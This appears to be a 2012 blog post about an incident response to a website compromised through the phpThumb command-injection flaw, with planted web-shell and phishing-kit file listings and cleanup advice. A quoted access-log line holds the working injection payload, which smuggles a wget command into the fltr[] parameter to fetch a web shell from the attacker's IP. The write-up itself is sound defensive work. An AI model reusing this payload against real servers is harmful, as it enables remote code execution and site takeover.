Security Comprimised by PHPThumb Vulnerability – Solved

Today, i got an urgent message about a website, which actually got hacked due to an opensource PHP library for Image Modification operations ‘phpThumb’. phpThumb have published a security update end of last year (August 2011) but it was not updated on server.

Vulnerability is mentioned here …

http://secunia.com/advisories/39556

http://forum.intern0t.org/exploits-vulnerabilities-pocs/2969-phpthumb-all-versions-arbitrary-command-execution.html

The hacker footprint was …

I fetched all files changes in last 2 days … by going to public_html and running

# find ./ -type f -ctime -2 -exec ls -lcr {} \; > ../last-activity.txt

Interesting results … The Web Shell, Perl and PHP files …

-rw-r–r– 1 user user 24911 May 15 08:08 ./phpthumb/filess.php
-rw-r–r– 1 user user 4549 May 15 08:10 ./phpthumb/cp.txt
-rw-r–r– 1 user user 1076 May 15 08:13 ./phpthumb/confspy.log
-rw-r–r– 1 user user 24911 May 15 08:08 ./phpthumb/filess.php.1
-rw-r–r– 1 user user 194113 May 15 10:09 ./config.php

and The Phising Codes

-rw-r–r– 1 user user 28469 May 15 11:36 ./webmail.uncfsu.edu.zip
-rw-r–r– 1 user user 3669 May 15 11:37 ./webmail.uncfsu.edu/login_files/flogon.js
-rw-r–r– 1 user user 1144 May 15 11:37 ./webmail.uncfsu.edu/login_files/lgnexlogo.gif
-rw-r–r– 1 user user 2512 May 15 11:37 ./webmail.uncfsu.edu/login_files/lgntopr.gif
-rw-r–r– 1 user user 3461 May 15 11:37 ./webmail.uncfsu.edu/login_files/owafont.css
-rw-r–r– 1 user user 2310 May 15 11:37 ./webmail.uncfsu.edu/login_files/logon.css

…………………

-rw-r–r– 1 user user 222219 May 15 15:08 ./chaseupdating.zip
-rw-r–r– 1 user user 1245 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK.php
-rw-r–r– 1 user user 5692 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/Logon.php
-rw-r–r– 1 user user 316 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/index.php
-rw-r–r– 1 user user 29742 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/details.php
-rw-r–r– 1 user user 323 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/default_bg.gif
-rw-r–r– 1 user user 1556 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/search_button_home.gif
-rw-r–r– 1 user user 121 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/curvebg_darkblue_right.gif

Visiting Access Logs, explored exact details of the intruder actions …

41.138.185.64 – – [15/May/2012:08:08:51 -0600] “GET /vendors/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://41.138.185.64/filess.php;%20&phpThumbDebug=9 HTTP/1.1″ 200 48077 “-” “Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62”
41.138.185.64 – – [15/May/2012:08:08:58 -0600] “GET /vendors/phpthumb/filess.php HTTP/1.1” 200 471 “-” “Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62”
41.138.185.64 – – [15/May/2012:10:09:26 -0600] “GET /config.php HTTP/1.1” 302 378 “-” “Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62”

Looking Dangerous ?

…………………

Solution:

1.) Remove the infection from the files

2.) Ensure there as no php shells left behind

3.) Upgrade the software and keep upgrading.

http://www.webhostingtalk.com/showthread.php?t=972669

A must do thing is to keep an eye on http://secunia.com/advisories about vulnerabilities detected time by time.

I would suggest to make a gdocs file to track the all such cases. for e.g.

3rd party libs | installed version | released version | last check date.

Share your thoughts & feedback

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: